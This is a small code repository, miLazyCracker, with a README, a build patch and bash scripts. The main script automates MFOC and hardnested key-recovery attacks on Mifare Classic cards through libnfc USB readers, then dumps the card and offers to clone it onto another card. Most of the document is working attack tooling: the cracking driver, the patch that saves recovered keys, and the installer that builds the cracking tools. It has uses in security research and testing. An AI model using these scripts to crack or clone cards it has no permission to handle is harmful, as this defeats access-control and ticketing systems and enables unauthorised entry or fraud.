├── README.md
├── crypto1_bs.diff
├── miLazyCracker.sh
├── miLazyCrackerFreshInstall.sh
└── miLazyCrackerUninstall.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # miLazyCracker
 2 | Mifare Classic Plus - Hardnested Attack Implementation for LibNFC USB readers (SCL3711, ASK LoGO, etc)
 3 | 
 4 | Installation:
 5 | 
 6 | ```bash
 7 | ./miLazyCrackerFreshInstall.sh
 8 | ```
 9 | 
10 | Usage example: place a tag and enjoy
11 | ```bash
12 | mkdir mydumps
13 | cd mydumps
14 | miLazyCracker
15 | ```
16 | 
17 | Possible issue: 
18 | ```bash
19 | error	libnfc.driver.pn53x_usb	Unable to set USB configuration (Device or resource busy)
20 | ```
21 | Fix: 
22 | ```bash
23 | sudo modprobe -r pn533_usb
24 | ```
25 | 
26 | 
27 | 
28 | This tool is comprised of work from:
29 | -  Aram Verstegen (https://github.com/aczid/crypto1_bs) 
30 | 
31 | -  Carlo Meijer and Roel Verdult: (https://www.cs.ru.nl/~rverdult/Ciphertext-only_Cryptanalysis_on_Hardened_Mifare_Classic_Cards-CCS_2015.pdf)
32 | 
33 | -  Iceman Proxmark Branch: https://github.com/iceman1001/proxmark
34 | 
35 | -  Piwi Proxmark Branch - https://github.com/pwpiwi/proxmark3/tree/hard_nested
36 | 
37 | -  Blapost Solver
38 | 
39 | -  MFOC - https://github.com/nfc-tools/mfoc
40 | 
41 | -  MFCUK - https://github.com/nfc-tools/mfcuk
42 | 
43 | 


--------------------------------------------------------------------------------
/crypto1_bs.diff:
--------------------------------------------------------------------------------
 1 | diff --git a/Makefile b/Makefile
 2 | index 758e411..c0708be 100755
 3 | --- a/Makefile
 4 | +++ b/Makefile
 5 | @@ -7,7 +7,7 @@
 6 |  
 7 |  CC     = gcc
 8 |  
 9 | -CFLAGS = -std=gnu99 -O3 -march=native
10 | +CFLAGS = -std=gnu99 -O3 -march=native -fcommon
11 |  
12 |  all: solve_bs solve_piwi_bs solve_piwi libnfc_crypto1_crack
13 |  
14 | diff --git a/libnfc_crypto1_crack.c b/libnfc_crypto1_crack.c
15 | index 2015dcb..4147433 100755
16 | --- a/libnfc_crypto1_crack.c
17 | +++ b/libnfc_crypto1_crack.c
18 | @@ -730,6 +730,17 @@ int main (int argc, const char * argv[]) {
19 |          return 1;
20 |      } else {
21 |          printf("Found key: %012"PRIx64"\n", found_key);
22 | +        if (argc==7) {
23 | +            FILE *fpKey = NULL;
24 | +            fpKey = fopen(argv[6], "a");
25 | +            if (fpKey) {
26 | +                fprintf(fpKey, "%012"PRIx64"\r\n", found_key);
27 | +                fclose(fpKey);
28 | +            } else {
29 | +                fprintf(stderr, "Cannot open: %s, exiting\n", argv[6]);
30 | +                return 1;
31 | +            }
32 | +        }
33 |      }
34 |      printf("Tested %"llu" states\n", total_states_tested);
35 |  
36 | 


--------------------------------------------------------------------------------
/miLazyCracker.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # This is a general-purpose function to ask Yes/No questions in Bash, either
  4 | # with or without a default answer. It keeps repeating the question until it
  5 | # gets a valid answer.
  6 | 
  7 | ask() {
  8 |     local prompt default REPLY
  9 | 
 10 |     while true; do
 11 | 
 12 |         if [ "${2:-}" = "Y" ]; then
 13 |             prompt="Y/n"
 14 |             default=Y
 15 |         elif [ "${2:-}" = "N" ]; then
 16 |             prompt="y/N"
 17 |             default=N
 18 |         else
 19 |             prompt="y/n"
 20 |             default=
 21 |         fi
 22 | 
 23 |         # Ask the question (not using "read -p" as it uses stderr not stdout)
 24 |         echo -n "$1 [$prompt] "
 25 | 
 26 |         # Read the answer (use /dev/tty in case stdin is redirected from somewhere else)
 27 |         read REPLY </dev/tty
 28 | 
 29 |         # Default?
 30 |         if [ -z "$REPLY" ]; then
 31 |             REPLY=$default
 32 |         fi
 33 | 
 34 |         # Check if the reply is valid
 35 |         case "$REPLY" in
 36 |             Y*|y*) return 0 ;;
 37 |             N*|n*) return 1 ;;
 38 |         esac
 39 | 
 40 |     done
 41 | }
 42 | 
 43 | myUID=$(nfc-list -t 1|sed -n 's/ //g;/UID/s/.*://p')
 44 | TMPFILE_MFD="mfc_${myUID}_dump.mfd"
 45 | TMPFILE_UNK="mfc_${myUID}_unknownMfocSectorInfo.txt"
 46 | TMPFILE_FND="mfc_${myUID}_foundKeys.txt"
 47 | 
 48 | if [ -f "$TMPFILE_FND" ]; then
 49 |     if [ -f "extended-std.keys" ]; then
 50 |         mfoc -f "$TMPFILE_FND" -f "extended-std.keys" -O "$TMPFILE_MFD"  -D "$TMPFILE_UNK"
 51 |     else
 52 |         mfoc -f "$TMPFILE_FND" -O "$TMPFILE_MFD"  -D "$TMPFILE_UNK"
 53 |     fi
 54 | else
 55 |     if [ -f "extended-std.keys" ]; then
 56 |         mfoc -f "extended-std.keys" -O "$TMPFILE_MFD" -D "$TMPFILE_UNK"
 57 |     else
 58 |         mfoc -O "$TMPFILE_MFD" -D "$TMPFILE_UNK"
 59 |     fi
 60 | fi
 61 | mfocResult=$?
 62 | prngNotVulnerable=9
 63 | keepTrying=1
 64 | foundKeysForMFOC=" "
 65 | 
 66 | while [ $keepTrying -eq 1 ]; do
 67 |     #echo "MFOC result: $mfocResult"
 68 |     if [ "$mfocResult" == "$prngNotVulnerable" ]; then
 69 |         echo "MFOC not possible, detected hardened Mifare Classic"
 70 |         if [ "$mfocResult" -eq 9 ]; then
 71 |             count=0
 72 |             while read -r LINE; do
 73 |                 let count++
 74 |                 #echo "$count $LINE"
 75 |             done < "$TMPFILE_UNK"
 76 | 
 77 |             arr=($(echo "$LINE" | tr ';' ' '))
 78 |             #echo ${arr[0]}
 79 |             #echo ${arr[1]}
 80 |             #echo ${arr[2]}
 81 |             #echo ${arr[3]}
 82 |             #echo ${arr[4]}
 83 | 		
 84 | 	    temp=($(echo ${arr[0]}|fold -w2))
 85 |             knownKey=${temp[5]}${temp[4]}${temp[3]}${temp[2]}${temp[1]}${temp[0]}
 86 |             knownSectorNum=${arr[1]}
 87 |             knownKeyLetter=${arr[2]}
 88 |             unknownSectorNum=${arr[3]}
 89 |             unknownKeyLetter=${arr[4]}
 90 |             knownBlockNum=$((knownSectorNum * 4))
 91 |             unknownBlockNum=$((unknownSectorNum * 4))
 92 |             if [ "$knownSectorNum" -gt 31 ]; then
 93 |                 knownBlockNum=$((128+((knownSectorNum-32)*16)))
 94 |             fi
 95 |             if [ "$unknownSectorNum" -gt 31 ]; then
 96 |                 unknownBlockNum=$((128+((unknownSectorNum-32)*16)))
 97 |             fi
 98 |             echo "Trying HardNested Attack..."
 99 |             mycmd=(libnfc_crypto1_crack "$knownKey" "$knownBlockNum" "$knownKeyLetter" "$unknownBlockNum" "$unknownKeyLetter" "$TMPFILE_FND")
100 |             echo "${mycmd[@]}"
101 |             "${mycmd[@]}"
102 |         else
103 |             echo "mfoc returned: $mfocResult"
104 |             keepTrying=0
105 |         fi
106 | 
107 |         cryptoCrackResult=$?
108 |         if [ "$cryptoCrackResult" -eq 0 ];then
109 |             while read -r LINE
110 |             do
111 |             echo "$LINE"
112 |             done < "$TMPFILE_FND"
113 | 
114 |             #arr=(`echo $LINE | tr ';' ' '`)
115 |             #echo ${arr[0]}
116 |             #echo ${arr[1]}
117 |             #echo ${arr[2]}
118 |             #foundKeysForMFOC="$foundKeysForMFOC-k ${arr[0]} "
119 |             mycmd=(mfoc -f "$TMPFILE_FND" -O "$TMPFILE_MFD"  -D "$TMPFILE_UNK")
120 |             echo "${mycmd[@]}"
121 |             "${mycmd[@]}"
122 |             mfocResult=$?
123 |         fi
124 |     else
125 |         keepTrying=0
126 |     fi
127 | done
128 | 
129 | rm -f "$TMPFILE_UNK" "0x${myUID}_"*".txt"
130 | if [ $mfocResult -eq 0 ]; then
131 |     echo -e "\n\nDump left in: $TMPFILE_MFD"
132 |     if ask "Do you want clone the card? Place card on reader now and press Y"; then
133 |          nfc-mfclassic W a $TMPFILE_MFD
134 |     fi
135 | else
136 |     rm -f "$TMPFILE_MFD"
137 | fi
138 | 


--------------------------------------------------------------------------------
/miLazyCrackerFreshInstall.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # try to get craptev1-v1.1.tar.xz and crapto1-v3.3.tar.xz
 4 | # 2550aa92fcb504b62dbc4a978c51d283f34ed2d393ea0c55444dc4bf5cd3c4e4  craptev1-v1.1.tar.xz
 5 | # c116df63d88bea2966b98cf77170a7382585789b9e47088766e167a666230a20  crapto1-v3.3.tar.xz
 6 | [ -f craptev1-v1.1.tar.xz ] || wget https://web.archive.org/web/20190221140220if_/https://www2.vaneay.fr/mifare/craptev1-v1.1.tar.xz
 7 | [ -f crapto1-v3.3.tar.xz ] || wget https://web.archive.org/web/20190221140255if_/https://www2.vaneay.fr/mifare/crapto1-v3.3.tar.xz
 8 | 
 9 | if [ ! -f craptev1-v1.1.tar.xz ] || [ ! -f crapto1-v3.3.tar.xz ]; then
10 |     echo "I need craptev1-v1.1.tar.xz and crapto1-v3.3.tar.xz. Aborting."
11 |     exit 1
12 | fi
13 | 
14 | set -x
15 | 
16 | # run this from inside miLazyCracker git repo
17 | if [ -f "/etc/debian_version" ]; then
18 |     pkgs=""
19 |     for pkg in git libnfc-bin autoconf libnfc-dev; do
20 |         if ! dpkg -l $pkg >/dev/null 2>&1; then
21 |             pkgs="$pkgs $pkg"
22 |         fi
23 |     done
24 |     if [ "$pkgs" != "" ]; then
25 |         sudo apt-get install $pkgs
26 |     fi
27 | fi
28 | 
29 | # install MFOC
30 | [ -d mfoc ] || git clone https://github.com/nfc-tools/mfoc.git
31 | (
32 |     cd mfoc || exit 1
33 |     git reset --hard
34 |     git clean -dfx
35 |     # tested against commit 9d9f01fb
36 |     autoreconf -vfi
37 |     ./configure
38 |     make
39 |     sudo make install
40 | )
41 | 
42 | # install Hardnested Attack Tool
43 | [ -d crypto1_bs ] || git clone https://github.com/aczid/crypto1_bs
44 | (
45 |     cd crypto1_bs || exit 1
46 |     git reset --hard
47 |     git clean -dfx
48 |     # patch initially done against commit 89de1ba5:
49 |     patch -p1 < ../crypto1_bs.diff
50 |     tar Jxvf ../craptev1-v1.1.tar.xz
51 |     mkdir crapto1-v3.3
52 |     tar Jxvf ../crapto1-v3.3.tar.xz -C crapto1-v3.3
53 |     make
54 |     sudo cp -a libnfc_crypto1_crack /usr/local/bin
55 | )
56 | 
57 | # install our script
58 | sudo cp -a miLazyCracker.sh /usr/local/bin/miLazyCracker
59 | echo "Done."
60 | 


--------------------------------------------------------------------------------
/miLazyCrackerUninstall.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # uninstall dependencies
 4 | #sudo apt-get remove git
 5 | #sudo apt-get remove libnfc-bin
 6 | #sudo apt-get remove autoconf
 7 | #sudo apt-get remove libnfc-dev
 8 | 
 9 | # uninstall MFOC
10 | sudo rm -f /usr/local/bin/mfoc /usr/local/share/man/man1/mfoc.1
11 | 
12 | # uninstall Hardnested Attack Tool
13 | sudo rm -f /usr/local/bin/libnfc_crypto1_crack
14 | 
15 | # uninstall our script
16 | sudo rm -f /usr/local/bin/miLazyCracker
17 | 


--------------------------------------------------------------------------------